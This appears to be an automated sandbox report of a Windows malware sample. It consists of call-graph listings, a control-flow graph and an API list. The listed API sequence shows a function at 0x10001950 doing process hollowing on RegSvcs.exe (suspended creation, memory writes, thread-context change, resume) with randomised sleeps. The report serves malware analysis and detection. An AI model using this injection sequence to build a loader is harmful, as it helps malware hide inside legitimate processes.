113911->113867 113913->113882 113914->113895 113915->113891 113923 100019a2 CreateProcessA 113922->113923 113923->113081 113923->113087 113929 1000d976 GetLastError 113924->113929 113926 1000d964 113927 10001e85 Sleep 113926->113927 113944 1000b3df 70 API calls 3 library calls 113926->113944 113927->113037 113945 1000e659 FlsGetValue 113929->113945 113931 1000d98b 113932 1000d992 113931->113932 113933 1000d9d9 SetLastError 113931->113933 113946 100085bd 70 API calls __calloc_impl 113932->113946 113933->113926 113935 1000d99e 113935->113933 113947 1000e667 FlsSetValue 113935->113947 113937 1000d9b2 113938 1000d9d0 113937->113938 113939 1000d9b8 113937->113939 113949 100054a4 70 API calls 2 library calls 113938->113949 113948 1000d9e5 70 API calls 4 library calls 113939->113948 113945->113931 113946->113935 113947->113937 113950->113060 110885 d11044 110890 d12735 110885->110890 110887 d1104a 110926 d30433 29 API calls __onexit 110887->110926 110889 d11054 110927 d129da 110890->110927 110894 d127ac 110895 d1bf07 8 API calls 110894->110895 110896 d127b6 110895->110896 110897 d1bf07 8 API calls 110896->110897 110898 d127c0 110897->110898 110899 d1bf07 8 API calls 110898->110899 110900 d127ca 110899->110900 110901 d1bf07 8 API calls 110900->110901 110902 d12808 110901->110902 110903 d1bf07 8 API calls 110902->110903 110904 d128d4 110903->110904 110937 d12d5e 110904->110937 110908 d12906 110909 d1bf07 8 API calls 110908->110909 110910 d12910 110909->110910 110958 d230e0 110910->110958 110912 d1293b 110968 d130ed 110912->110968 110914 d12957 110915 d12967 GetStdHandle 110914->110915 110916 d539c1 110915->110916 110917 d129bc 110915->110917 110916->110917 110918 d539ca 110916->110918 110920 d129c9 OleInitialize 110917->110920 110919 d3016b 8 API calls 110918->110919 110921 d539d1 110919->110921 110920->110887 110975 d809d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 110921->110975 110926->110889 110977 d12a33 110927->110977 110930 d12a33 8 API calls 110931 d12a12 110930->110931 110932 d1bf07 8 API calls 110931->110932 110933 d12a1e 110932->110933 110934 d184b7 8 API calls 110933->110934 110935 d1276b 110934->110935 110936 d13205 6 API calls 110935->110936 110936->110894 110938 d1bf07 8 API calls 110937->110938 110939 d12d6e 110938->110939 110940 d1bf07 8 API calls 110939->110940 110941 d12d76 110940->110941 110942 d1bf07 8 API calls 110941->110942 110943 d12d91 110942->110943 110944 d3016b 8 API calls 110943->110944 110945 d128de 110944->110945 110946 d1318c 110945->110946 110947 d1319a 110946->110947 110948 d1bf07 8 API calls 110947->110948 110949 d131a5 110948->110949 110950 d1bf07 8 API calls 110949->110950 110951 d131b0 110950->110951 110952 d1bf07 8 API calls 110951->110952 110953 d131bb 110952->110953 110954 d1bf07 8 API calls 110953->110954 110955 d131c6 110954->110955 110956 d3016b 8 API calls 110955->110956 110957 d131d8 RegisterWindowMessageW 110956->110957 110957->110908 110959 d23121 110958->110959 110960 d230fd 110958->110960 110961 d305d2 5 API calls 110959->110961 110963 d305d2 5 API calls 110960->110963 110967 d2310e 110960->110967 110962 d2312b 110961->110962 110962->110960 110984 d30588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 110962->110984 110964 d29ec7 110963->110964 110964->110967 110985 d30588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 110964->110985 110967->110912 110969 d53c69 110968->110969 110970 d130fd 110968->110970 110986 d83b63 8 API calls 110969->110986 110971 d3016b 8 API calls 110970->110971 110974 d13105 110971->110974 110973 d53c74 110974->110914 110978 d1bf07 8 API calls 110977->110978 110979 d12a3e 110978->110979 110980 d1bf07 8 API calls 110979->110980 110981 d12a46 110980->110981 110982 d1bf07 8 API calls 110981->110982 110983 d12a08 110982->110983 110983->110930 110984->110960 110985->110967 110986->110973 113951 d527a2 113954 d12a52 113951->113954 113955 d12a91 mciSendStringW 113954->113955 113956 d539f4 DestroyWindow 113954->113956 113957 d12d08 113955->113957 113958 d12aad 113955->113958 113967 d53a00 113956->113967 113957->113958 113960 d12d17 UnregisterHotKey 113957->113960 113959 d12abb 113958->113959 113958->113967 113986 d12e70 113959->113986 113960->113957 113962 d53a1e FindClose 113962->113967 113964 d53a45 113968 d53a69 113964->113968 113969 d53a58 FreeLibrary 113964->113969 113965 d17953 CloseHandle 113965->113967 113966 d12ad0 113966->113968 113974 d12ade 113966->113974 113967->113962 113967->113964 113967->113965 113970 d53a7d VirtualFree 113968->113970 113975 d12b4b 113968->113975 113969->113964 113970->113968 113971 d12b3a OleUninitialize 113971->113975 113972 d53ac5 113978 d53ad4 ISource 113972->113978 113992 d83c45 6 API calls ISource 113972->113992 113974->113971 113975->113972 113976 d12b56 113975->113976 113990 d12f86 VirtualFreeEx CloseHandle 113976->113990 113982 d53b63 113978->113982 113993 d76d63 8 API calls ISource 113978->113993 113980 d12b7c 113980->113978 113981 d12c61 113980->113981 113981->113982 113983 d12caf 113981->113983 113982->113982 113983->113982 113991 d12eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 113983->113991 113985 d12d03 113987 d12e7d 113986->113987 113988 d12ac2 113987->113988 113994 d778b9 8 API calls 113987->113994 113988->113964 113988->113966 113990->113980 113991->113985 113992->113972 113993->113978 113994->113987 110988 d41e4c 110997 d4d1e0 GetEnvironmentStringsW 110988->110997 110992 d41e64 110993 d42d58 _free 20 API calls 110992->110993 110994 d41e99 110993->110994 110995 d41e6f 111005 d42d58 110995->111005 110998 d4d1f4 110997->110998 110999 d41e5e 110997->110999 111011 d43bb0 110998->111011 110999->110992 111004 d41f70 26 API calls 3 library calls 110999->111004 111001 d4d208 __fread_nolock 111002 d42d58 _free 20 API calls 111001->111002 111003 d4d222 FreeEnvironmentStringsW 111002->111003 111003->110999 111004->110995 111006 d42d63 RtlFreeHeap 111005->111006 111010 d42d8c _free 111005->111010 111007 d42d78 111006->111007 111006->111010 111020 d3f669 20 API calls _abort 111007->111020 111009 d42d7e GetLastError 111009->111010 111010->110992 111012 d43bee 111011->111012 111013 d43bbe _abort 111011->111013 111019 d3f669 20 API calls _abort 111012->111019 111013->111012 111014 d43bd9 RtlAllocateHeap 111013->111014 111018 d3523d 7 API calls 2 library calls 111013->111018 111014->111013 111016 d43bec 111014->111016 111016->111001 111018->111013 111019->111016 111020->111009 111021 d3078b 111022 d30797 ___BuildCatchObject 111021->111022 111051 d30241 111022->111051 111024 d308f1 111092 d30bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 111024->111092 111026 d3079e 111026->111024 111028 d307c8 111026->111028 111027 d308f8 111085 d351e2 111027->111085 111038 d30807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 111028->111038 111062 d4280d 111028->111062 111035 d307e7 111037 d30868 111070 d30ce9 111037->111070 111038->111037 111088 d351aa 38 API calls 2 library calls 111038->111088 111040 d3086e 111074 d132a2 111040->111074 111045 d3088a 111045->111027 111046 d3088e 111045->111046 111047 d30897 111046->111047 111090 d35185 28 API calls _abort 111046->111090 111091 d303d0 13 API calls 2 library calls 111047->111091 111050 d3089f 111050->111035 111052 d3024a 111051->111052 111094 d30a28 IsProcessorFeaturePresent 111052->111094 111054 d30256 111095 d33024 10 API calls 3 library calls 111054->111095 111056 d3025b 111057 d3025f 111056->111057 111096 d426a7 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 111056->111096 111057->111026 111059 d30268 111060 d30276 111059->111060 111097 d3304d 8 API calls 3 library calls 111059->111097 111060->111026 111064 d42824 111062->111064 111098 d30e1c 111064->111098 111065 d307e1 111065->111035 111066 d427b1 111065->111066 111067 d427e0 111066->111067 111068 d30e1c _ValidateLocalCookies 5 API calls 111067->111068 111069 d42809 111068->111069 111069->111038 111106 d326d0 111070->111106 111073 d30d0f 111073->111040 111075 d13309 111074->111075 111076 d132ae IsThemeActive 111074->111076 111089 d30d22 GetModuleHandleW 111075->111089 111108 d352d3 111076->111108 111078 d132d9 111114 d35339 111078->111114 111080 d132e0 111121 d1326d SystemParametersInfoW SystemParametersInfoW 111080->111121 111082 d132e7 111122 d13312 111082->111122 112134 d34f5f 111085->112134 111088->111037 111089->111045 111090->111047 111091->111050 111092->111027 111094->111054 111095->111056 111096->111059 111097->111057 111099 d30e27 IsProcessorFeaturePresent 111098->111099 111100 d30e25 111098->111100 111102 d30fee 111099->111102 111100->111065 111105 d30fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 111102->111105 111104 d310d1 111104->111065 111105->111104 111107 d30cfc GetStartupInfoW 111106->111107 111107->111073 111109 d352df ___BuildCatchObject 111108->111109 111171 d432ee EnterCriticalSection 111109->111171 111111 d352ea pre_c_initialization 111172 d3532a 111111->111172 111113 d3531f __wsopen_s 111113->111078 111115 d35345 111114->111115 111116 d3535f 111114->111116 111115->111116 111176 d3f669 20 API calls _abort 111115->111176 111116->111080 111118 d3534f 111177 d42b7c 26 API calls _abort 111118->111177 111120 d3535a 111120->111080 111121->111082 111123 d13322 __wsopen_s 111122->111123 111124 d1bf07 8 API calls 111123->111124 111125 d1332e GetCurrentDirectoryW 111124->111125 111178 d14f60 111125->111178 111171->111111 111175 d43336 LeaveCriticalSection 111172->111175 111174 d35331 111174->111113 111175->111174 111176->111118 111177->111120 111179 d1bf07 8 API calls 111178->111179 111180 d14f76 111179->111180 111307 d160f5 111180->111307 111182 d14f94 111183 d1bceb 8 API calls 111182->111183 111184 d14fa8 111183->111184 111185 d1be6d 8 API calls 111184->111185 111186 d14fb3 111185->111186 111321 d188e8 111186->111321 111189 d1b25f 8 API calls 111190 d14fcc 111189->111190 111191 d1bdc1 39 API calls 111190->111191 111192 d14fdc 111191->111192 111193 d1b25f 8 API calls 111192->111193 111194 d15002 111193->111194 111195 d1bdc1 39 API calls 111194->111195 111196 d15011 111195->111196 111197 d1bf07 8 API calls 111196->111197 111198 d1502f 111197->111198 111324 d15151 111198->111324 111308 d16102 __wsopen_s 111307->111308 111309 d184b7 8 API calls 111308->111309 111310 d16134 111308->111310 111309->111310 111319 d1616a 111310->111319 111362 d1627c 111310->111362 111312 d1b25f 8 API calls 111314 d16261 111312->111314 111313 d1b25f 8 API calls 111313->111319 111315 d1684e 8 API calls 111314->111315 111317 d1626d 111315->111317 111316 d1627c 8 API calls 111316->111319 111317->111182 111318 d1684e 8 API calls 111318->111319 111319->111313 111319->111316 111319->111318 111320 d16238 111319->111320 111320->111312 111320->111317 111322 d3016b 8 API calls 111321->111322 111323 d14fbf 111322->111323 111323->111189 111325 d15179 111324->111325 111326 d1515b 111324->111326 111328 d184b7 8 API calls 111325->111328 111363 d1c269 8 API calls 111362->111363 111364 d16287 111363->111364 111364->111310 112135 d34f6b _abort 112134->112135 112136 d34f72 112135->112136 112137 d34f84 112135->112137 112173 d350b9 GetModuleHandleW 112136->112173 112158 d432ee EnterCriticalSection 112137->112158 112140 d34f77 112140->112137 112174 d350fd GetModuleHandleExW 112140->112174 112144 d35000 112152 d427b1 _abort 5 API calls 112144->112152 112155 d35018 112144->112155 112146 d35072 112182 d520c9 5 API calls _ValidateLocalCookies 112146->112182 112147 d35046 112165 d35078 112147->112165 112148 d34f8b 112148->112144 112156 d35029 112148->112156 112159 d42538 112148->112159 112152->112155 112153 d427b1 _abort 5 API calls 112153->112156 112155->112153 112162 d35069 112156->112162 112158->112148 112183 d42271 112159->112183 112202 d43336 LeaveCriticalSection 112162->112202 112164 d35042 112164->112146 112164->112147 112203 d4399c 112165->112203 112168 d350a6 112171 d350fd _abort 8 API calls 112168->112171 112169 d35086 GetPEB 112169->112168 112170 d35096 GetCurrentProcess TerminateProcess 112169->112170 112170->112168 112172 d350ae ExitProcess 112171->112172 112173->112140 112175 d35127 GetProcAddress 112174->112175 112176 d3514a 112174->112176 112177 d3513c 112175->112177 112178 d35150 FreeLibrary 112176->112178 112179 d35159 112176->112179 112177->112176 112178->112179 112180 d30e1c _ValidateLocalCookies 5 API calls 112179->112180 112181 d34f83 112180->112181 112181->112137 112186 d42220 112183->112186 112185 d42295 112185->112144 112187 d4222c ___BuildCatchObject 112186->112187 112194 d432ee EnterCriticalSection 112187->112194 112189 d4223a 112195 d422c1 112189->112195 112193 d42258 __wsopen_s 112193->112185 112194->112189 112198 d422e9 112195->112198 112199 d422e1 112195->112199 112196 d30e1c _ValidateLocalCookies 5 API calls 112197 d42247 112196->112197 112201 d42265 LeaveCriticalSection _abort 112197->112201 112198->112199 112200 d42d58 _free 20 API calls 112198->112200 112199->112196 112200->112199 112201->112193 112202->112164 112204 d439b7 112203->112204 112205 d439c1 112203->112205 112207 d30e1c _ValidateLocalCookies 5 API calls 112204->112207 112210 d43367 5 API calls 2 library calls 112205->112210 112208 d35082 112207->112208 112208->112168 112208->112169 112209 d439d8 112209->112204 112210->112209 112211 d3f08e 112212 d3f09a ___BuildCatchObject 112211->112212 112213 d3f0a6 112212->112213 112214 d3f0bb 112212->112214 112230 d3f669 20 API calls _abort 112213->112230 112224 d3951d EnterCriticalSection 112214->112224 112217 d3f0ab 112231 d42b7c 26 API calls _abort 112217->112231 112218 d3f0c7 112225 d3f0fb 112218->112225 112223 d3f0b6 __wsopen_s 112224->112218 112233 d3f126 112225->112233 112227 d3f108 112228 d3f0d4 112227->112228 112253 d3f669 20 API calls _abort 112227->112253 112232 d3f0f1 LeaveCriticalSection __fread_nolock 112228->112232 112230->112217 112231->112223 112232->112223 112234 d3f134 112233->112234 112235 d3f14e 112233->112235 112257 d3f669 20 API calls _abort 112234->112257 112236 d3dce5 __fread_nolock 26 API calls 112235->112236 112238 d3f157 112236->112238 112254 d49799 112238->112254 112239 d3f139 112258 d42b7c 26 API calls _abort 112239->112258 112243 d3f25b 112245 d3f268 112243->112245 112248 d3f20e 112243->112248 112244 d3f1df 112247 d3f1fc 112244->112247 112244->112248 112260 d3f669 20 API calls _abort 112245->112260 112259 d3f43f 31 API calls 4 library calls 112247->112259 112250 d3f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 112248->112250 112261 d3f2bb 30 API calls 2 library calls 112248->112261 112250->112227 112251 d3f206 112251->112250 112253->112228 112262 d49616 112254->112262 112256 d3f173 112256->112243 112256->112244 112256->112250 112257->112239 112258->112250 112259->112251 112260->112250 112261->112250 112263 d49622 ___BuildCatchObject 112262->112263 112264 d49642 112263->112264 112265 d4962a 112263->112265 112266 d496f6 112264->112266 112272 d4967a 112264->112272 112297 d3f656 20 API calls _abort 112265->112297 112302 d3f656 20 API calls _abort 112266->112302 112268 d4962f 112298 d3f669 20 API calls _abort 112268->112298 112271 d496fb 112303 d3f669 20 API calls _abort 112271->112303 112287 d454d7 EnterCriticalSection 112272->112287 112273 d49637 __wsopen_s 112273->112256 112276 d49703 112304 d42b7c 26 API calls _abort 112276->112304 112277 d49680 112279 d496a4 112277->112279 112280 d496b9 112277->112280 112299 d3f669 20 API calls _abort 112279->112299 112288 d4971b 112280->112288 112283 d496a9 112300 d3f656 20 API calls _abort 112283->112300 112286 d496b4 112301 d496ee LeaveCriticalSection __wsopen_s 112286->112301 112287->112277 112289 d45754 __wsopen_s 26 API calls 112288->112289 112290 d4972d 112289->112290 112291 d49735 112290->112291 112292 d49746 SetFilePointerEx 112290->112292 112305 d3f669 20 API calls _abort 112291->112305 112294 d4975e GetLastError 112292->112294 112296 d4973a 112292->112296 112306 d3f633 20 API calls 2 library calls 112294->112306 112296->112286 112297->112268 112298->112273 112299->112283 112300->112286 112301->112273 112302->112271 112303->112276 112304->112273 112305->112296 112306->112296 112307 d1f48c 112308 d1ca50 180 API calls 112307->112308 112309 d1f49a 112308->112309 113995 d20e6f 113996 d20e83 113995->113996 114002 d213d5 113995->114002 113997 d3016b 8 API calls 113996->113997 114000 d20e95 113996->114000 113997->114000 113998 d655d0 114030 d81a29 8 API calls 113998->114030 114000->113998 114001 d20eee 114000->114001 114029 d1b3fe 8 API calls 114000->114029 114004 d22ad0 180 API calls 114001->114004 114020 d2044d ISource 114001->114020 114002->114000 114005 d1be6d 8 API calls 114002->114005 114026 d20326 ISource 114004->114026 114005->114000 114006 d662cf 114034 d83ef6 81 API calls __wsopen_s 114006->114034 114007 d21645 114013 d1be6d 8 API calls 114007->114013 114007->114020 114008 d21e00 40 API calls 114008->114026 114010 d65c7f 114017 d1be6d 8 API calls 114010->114017 114010->114020 114011 d661fe 114033 d83ef6 81 API calls __wsopen_s 114011->114033 114012 d1be6d 8 API calls 114012->114026 114013->114020 114017->114020 114018 d305d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 114018->114026 114019 d1bf07 8 API calls 114019->114026 114021 d30433 29 API calls pre_c_initialization 114021->114026 114022 d660b9 114031 d83ef6 81 API calls __wsopen_s 114022->114031 114024 d3016b 8 API calls 114024->114026 114025 d20a5e ISource 114032 d83ef6 81 API calls __wsopen_s 114025->114032 114026->114006 114026->114007 114026->114008 114026->114010 114026->114011 114026->114012 114026->114018 114026->114019 114026->114020 114026->114021 114026->114022 114026->114024 114026->114025 114027 d30588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 114026->114027 114028 d21940 180 API calls 2 library calls 114026->114028 114027->114026 114028->114026 114029->114000 114030->114020 114031->114025 114032->114020 114033->114020 114034->114020 114035 d215af 114036 d2e34f 8 API calls 114035->114036 114037 d215c5 114036->114037 114042 d2e3b3 114037->114042 114039 d215ef 114040 d661ab 114039->114040 114054 d83ef6 81 API calls __wsopen_s 114039->114054 114043 d17a14 8 API calls 114042->114043 114044 d2e3ea 114043->114044 114045 d1b25f 8 API calls 114044->114045 114048 d2e41b 114044->114048 114046 d6e4e4 114045->114046 114047 d17af4 8 API calls 114046->114047 114049 d6e4ef 114047->114049 114048->114039 114050 d2e73b 39 API calls 114049->114050 114051 d6e502 114050->114051 114052 d6e506 114051->114052 114055 d1b3fe 8 API calls 114051->114055 114054->114040 114055->114052 114056 d6176b 114057 d61782 114056->114057 114059 d1d250 114057->114059 114060 d83ef6 81 API calls __wsopen_s 114057->114060 114060->114059 112310 d4948a 112311 d49497 112310->112311 112315 d494af 112310->112315 112360 d3f669 20 API calls _abort 112311->112360 112313 d4949c 112361 d42b7c 26 API calls _abort 112313->112361 112316 d4950a 112315->112316 112324 d494a7 112315->112324 112362 d50164 21 API calls 2 library calls 112315->112362 112318 d3dce5 __fread_nolock 26 API calls 112316->112318 112319 d49522 112318->112319 112330 d48fc2 112319->112330 112321 d49529 112322 d3dce5 __fread_nolock 26 API calls 112321->112322 112321->112324 112323 d49555 112322->112323 112323->112324 112325 d3dce5 __fread_nolock 26 API calls 112323->112325 112326 d49563 112325->112326 112326->112324 112327 d3dce5 __fread_nolock 26 API calls 112326->112327 112328 d49573 112327->112328 112329 d3dce5 __fread_nolock 26 API calls 112328->112329 112329->112324 112331 d48fce ___BuildCatchObject 112330->112331 112332 d48fd6 112331->112332 112333 d48fee 112331->112333 112364 d3f656 20 API calls _abort 112332->112364 112335 d490b4 112333->112335 112340 d49027 112333->112340 112371 d3f656 20 API calls _abort 112335->112371 112337 d48fdb 112365 d3f669 20 API calls _abort 112337->112365 112338 d490b9 112372 d3f669 20 API calls _abort 112338->112372 112342 d49036 112340->112342 112343 d4904b 112340->112343 112366 d3f656 20 API calls _abort 112342->112366 112363 d454d7 EnterCriticalSection 112343->112363 112345 d49043 112373 d42b7c 26 API calls _abort 112345->112373 112347 d49051 112349 d49082 112347->112349 112350 d4906d 112347->112350 112348 d4903b 112367 d3f669 20 API calls _abort 112348->112367 112355 d490d5 __fread_nolock 38 API calls 112349->112355 112368 d3f669 20 API calls _abort 112350->112368 112354 d48fe3 __wsopen_s 112354->112321 112357 d4907d 112355->112357 112356 d49072 112369 d3f656 20 API calls _abort 112356->112369 112370 d490ac LeaveCriticalSection __wsopen_s 112357->112370 112360->112313 112361->112324 112362->112316 112363->112347 112364->112337 112365->112354 112366->112348 112367->112345 112368->112356 112369->112357 112370->112354 112371->112338 112372->112345 112373->112354 112374 d2230c 112375 d22315 __fread_nolock 112374->112375 112377 d67487 112375->112377 112380 d22366 112375->112380 112381 d3016b 8 API calls 112375->112381 112384 d21fa7 __fread_nolock 112375->112384 112385 d3019b 8 API calls 112375->112385 112386 d18e70 112375->112386 112409 d1662b 8 API calls __fread_nolock 112377->112409 112379 d67493 112383 d1be6d 8 API calls 112379->112383 112379->112384 112382 d17cb3 8 API calls 112380->112382 112381->112375 112382->112384 112383->112384 112385->112375 112387 d18e85 112386->112387 112403 d18e82 112386->112403 112388 d18ebb 112387->112388 112389 d18e8d 112387->112389 112391 d56b10 112388->112391 112394 d18ecd 112388->112394 112400 d56a29 112388->112400 112410 d35556 26 API calls 112389->112410 112413 d35513 26 API calls 112391->112413 112392 d18e9d 112398 d3016b 8 API calls 112392->112398 112411 d2fe8f 51 API calls 112394->112411 112395 d56b28 112395->112395 112399 d18ea7 112398->112399 112401 d1b25f 8 API calls 112399->112401 112402 d3019b 8 API calls 112400->112402 112408 d56aa2 112400->112408 112401->112403 112404 d56a72 112402->112404 112403->112375 112405 d3016b 8 API calls 112404->112405 112406 d56a99 112405->112406 112407 d1b25f 8 API calls 112406->112407 112407->112408 112412 d2fe8f 51 API calls 112408->112412 112409->112379 112410->112392 112411->112392 112412->112391 112413->112395 114061 d61a68 114062 d61a70 114061->114062 114065 d1d4e5 114061->114065 114099 d779af 8 API calls __fread_nolock 114062->114099 114064 d61a82 114100 d77928 8 API calls __fread_nolock 114064->114100 114067 d3016b 8 API calls 114065->114067 114069 d1d539 114067->114069 114068 d61aac 114070 d202f0 180 API calls 114068->114070 114091 d1c2cd 114069->114091 114071 d61ad3 114070->114071 114073 d61ae7 114071->114073 114101 d960a2 53 API calls _wcslen 114071->114101 114076 d3016b 8 API calls 114084 d1d61e ISource 114076->114084 114077 d61b04 114077->114065 114102 d779af 8 API calls __fread_nolock 114077->114102 114079 d1c34b 8 API calls 114089 d1d95c ISource 114079->114089 114080 d1be6d 8 API calls 114080->114084 114083 d61f1c 114104 d755d9 8 API calls ISource 114083->114104 114084->114080 114084->114083 114085 d61f37 114084->114085 114087 d1c34b 8 API calls 114084->114087 114088 d1d8c1 ISource 114084->114088 114103 d1b3fe 8 API calls 114084->114103 114087->114084 114088->114079 114088->114089 114090 d1d973 114089->114090 114098 d2e284 8 API calls ISource 114089->114098 114094 d1c2dd 114091->114094 114092 d1c2e5 114092->114076 114093 d3016b 8 API calls 114093->114094 114094->114092 114094->114093 114095 d1bf07 8 API calls 114094->114095 114096 d1be6d 8 API calls 114094->114096 114097 d1c2cd 8 API calls 114094->114097 114095->114094 114096->114094 114097->114094 114098->114089 114099->114064 114100->114068 114101->114077 114102->114077 114103->114084 114104->114085

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • _rand.LIBCMT ref: 1000196E
                                                                                                      • Sleep.KERNELBASE(?,00000000,00000000,?), ref: 10001982
                                                                                                      • CreateProcessA.KERNELBASE(C:/Windows/Microsoft.NET/Framework/v2.0.50727/RegSvcs.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00000000,?), ref: 100019BC
                                                                                                      • _rand.LIBCMT ref: 100019CA
                                                                                                      • Sleep.KERNELBASE ref: 100019DE
                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 100019EF
                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 10001A04
                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 10001A27
                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 10001A3D
                                                                                                      • WriteProcessMemory.KERNELBASE(?,00000000,0000001C,?,00000000), ref: 10001A50
                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 10001A8D
                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 10001ABD
                                                                                                      • _rand.LIBCMT ref: 10001AC3
                                                                                                      • Sleep.KERNELBASE ref: 10001AD7
                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 10001AF3
                                                                                                      • ResumeThread.KERNELBASE(?), ref: 10001AFC
                                                                                                      • CloseHandle.KERNEL32(?), ref: 10001B17
                                                                                                      • CloseHandle.KERNEL32(?), ref: 10001B1C
                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10001B25
                                                                                                      • TerminateProcess.KERNEL32(00000000,00000001), ref: 10001B30
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 10001B37
                                                                                                      Strings
                                                                                                      • C:/Windows/Microsoft.NET/Framework/v2.0.50727/RegSvcs.exe, xrefs: 100019BB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$Memory$CloseHandleSleepThreadWrite_rand$AllocContextVirtualWow64$CreateOpenReadResumeTerminate
                                                                                                      • String ID: C:/Windows/Microsoft.NET/Framework/v2.0.50727/RegSvcs.exe
                                                                                                      • API String ID: 3126519540-2865586026
                                                                                                      • Opcode ID: a8d2c3c157cb4c9a538df01ab21a79c798eb2fc6eeb1c722c7a2b436802decf7
                                                                                                      • Instruction ID: 7670caf6896d29e861adfd135ddea9dc70b93db27502e33a34dedfb72287b7b3
                                                                                                      • Opcode Fuzzy Hash: a8d2c3c157cb4c9a538df01ab21a79c798eb2fc6eeb1c722c7a2b436802decf7
                                                                                                      • Instruction Fuzzy Hash: B6518171A40618AFEB21DBA4CC89FEEBBB5FF4C741F104028F615E61A0D7B4A850CB65
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 19 10001cb0-10001cc9 call 10001b50 22 10001cd0-10001d26 call 10002740 19->22 25 10001d52-10001d56 22->25 26 10001d28-10001d33 22->26 28 10001df5-10001e04 25->28 29 10001d5c-10001d5e 25->29 26->25 27 10001d35-10001d4f 26->27 27->25 30 10001e26-10001e64 call 10004595 28->30 31 10001e06-10001e0a 28->31 32 10001d60-10001d73 call 100037a0 call 10006aa1 29->32 33 10001d76-10001df2 29->33 43 10001ea5-10001eb3 call 10001c10 30->43 44 10001e66 30->44 34 10001e0c-10001e13 31->34 35 10001e1d-10001e23 call 100062c2 31->35 32->33 33->28 34->35 46 10001e15-10001e19 34->46 35->30 53 10001ef3-10001f49 call 10002740 43->53 54 10001eb5-10001eb7 43->54 48 10001e70-10001e9c call 10001950 call 10006275 Sleep 44->48 46->35 48->53 61 10001e9e-10001ea1 48->61 62 10001f75-10001f79 53->62 63 10001f4b-10001f56 53->63 54->53 57 10001eb9 54->57 60 10001ec0-10001eec call 10001950 call 10006275 Sleep 57->60 60->53 80 10001eee-10001ef1 60->80 61->48 65 10001ea3 61->65 67 10002018-10002027 62->67 68 10001f7f-10001f81 62->68 63->62 66 10001f58-10001f72 63->66 65->53 66->62 73 10002049-10002087 call 10004595 67->73 74 10002029-1000202d 67->74 70 10001f83-10001f91 call 100037a0 call 10006aa1 68->70 71 10001f99-10002015 68->71 91 10001f96 70->91 71->67 87 100020c3-100020d3 call 10002740 73->87 88 10002089-1000208b 73->88 75 10002040-10002046 call 100062c2 74->75 76 1000202f-10002036 74->76 75->73 76->75 89 10002038-1000203c 76->89 80->53 80->60 93 100020d8-10002119 87->93 88->87 92 1000208d 88->92 89->75 91->71 94 10002090-100020bc call 10001950 call 10006275 Sleep 92->94 95 10002145-10002149 93->95 96 1000211b-10002126 93->96 94->87 112 100020be-100020c1 94->112 99 100021e8-100021f7 95->99 100 1000214f-10002151 95->100 96->95 98 10002128-10002142 96->98 98->95 103 10002219-10002257 call 10004595 99->103 104 100021f9-100021fd 99->104 105 10002153-10002166 call 100037a0 call 10006aa1 100->105 106 10002169-100021e5 100->106 118 10002298-1000229a 103->118 119 10002259-1000225b 103->119 108 10002210-10002216 call 100062c2 104->108 109 100021ff-10002206 104->109 105->106 106->99 108->103 109->108 121 10002208-1000220c 109->121 112->87 112->94 118->22 122 100022a0-100022a6 118->122 119->122 123 1000225d 119->123 121->108 125 10002260-1000228c call 10001950 call 10006275 Sleep 123->125 125->122 130 1000228e-10002291 125->130 130->125 131 10002293 130->131 131->22
                                                                                                      APIs
                                                                                                        • Part of subcall function 10001B50: _fseek.LIBCMT ref: 10001B83
                                                                                                        • Part of subcall function 10001B50: _malloc.LIBCMT ref: 10001B9C
                                                                                                        • Part of subcall function 10001B50: _fseek.LIBCMT ref: 10001BA8
                                                                                                        • Part of subcall function 10001B50: __fread_nolock.LIBCMT ref: 10001BB3
                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 10001E58
                                                                                                      • _rand.LIBCMT ref: 10001E80
